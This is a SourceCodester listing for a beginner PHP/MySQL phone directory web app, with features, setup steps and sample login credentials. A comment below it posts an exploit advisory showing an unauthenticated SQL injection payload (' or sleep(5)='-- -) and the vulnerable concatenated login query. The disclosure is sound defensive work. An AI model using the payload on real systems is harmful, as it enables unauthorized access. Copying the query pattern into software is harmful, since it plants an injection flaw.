Simple Phone book/directory Web App using PHP Free Source Code
This is a PHP Mini-Project called Phone book/directory Web App. This is a simple web application for saving someone's contact number. This can be useful for a small company to serve as the employees/staffs contact directory or else. The main purpose of creating this app is to share this with you most especially for beginners and new to PHP language to have a simple PHP project to learn with. This will help you to learn how to develop a simple web application using the said programming language and MySQL Database that containing CRUD Operations/functionalities.
About the Phone book/Phone Directory Web App
This web-based application was developed using PHP, MySQL Database, HTML, CSS, and JavaScript. The application has a pleasant user interface and is easy to use. The system requires system users' credentials to access the list of the phone books or directories and other features of the application. The new user can create a new system account by registering their credentials. The source code is free to download. Feel Free to download and modify the source code to learn and enhance your PHP programming capabilities.
Features
- User Login and Registration
- Home Page
- Add New Contact
- Edit Contact Details
- Delete Details
- View All Contacts
- View Account Details
- Update Account Details
- Change Password
- Contact Us Page
- Logout
System Snapshots
User Registration Form
Home Page
New Contact Form
Update Contact Details Form
Contact List
Change Password
How to Run ??
Requirements
- Download and Install any local web server such as XAMPP/WAMP.
- Download the provided source code zip file. (download button is located below)
Installation/Setup
- Open your XAMPP/WAMP's Control Panel and start the
Apache
andMySQL
. - Extract the downloaded source code zip file.
- If you are using XAMPP, copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory. And If you are using WAMP, paste it into the "www" directory.
- Browse the
PHPMyAdmin
in a browser. i.e.http://localhost/phpmyadmin
- Create a new database naming
phonebook
. - Import the provided
SQL
file. The file is known asphonebook.sql
located inside the extracted source code folder. - Browse the Phone book/directory Web App in a browser. i.e.
http://localhost/PhoneBook
.
Sample User Access Information
Username: khan
Password: 123
DEMO
That's it! I hope this Phone book/directory Web App in PHP will help you with what you are looking for.
Enjoy :)
Note: Due to the size or complexity of this submission, the author has submitted it as a .zip file to shorten your download time. After downloading it, you will need a program like Winzip to decompress it.
Virus note: All files are scanned once-a-day by SourceCodester.com for viruses, but new viruses come out every day, so no prevention program can catch 100% of them.
FOR YOUR OWN SAFETY, PLEASE:
1. Re-scan downloaded files using your personal virus checker before using it.
2. NEVER, EVER run compiled files (.exe's, .ocx's, .dll's etc.)--only run source code.
Comments
Avoid SQL injection, please
# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username = ' or sleep(5)='-- -
Password = ' '
Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
Flawed code
Add new comment
- Add new comment
- 13310 views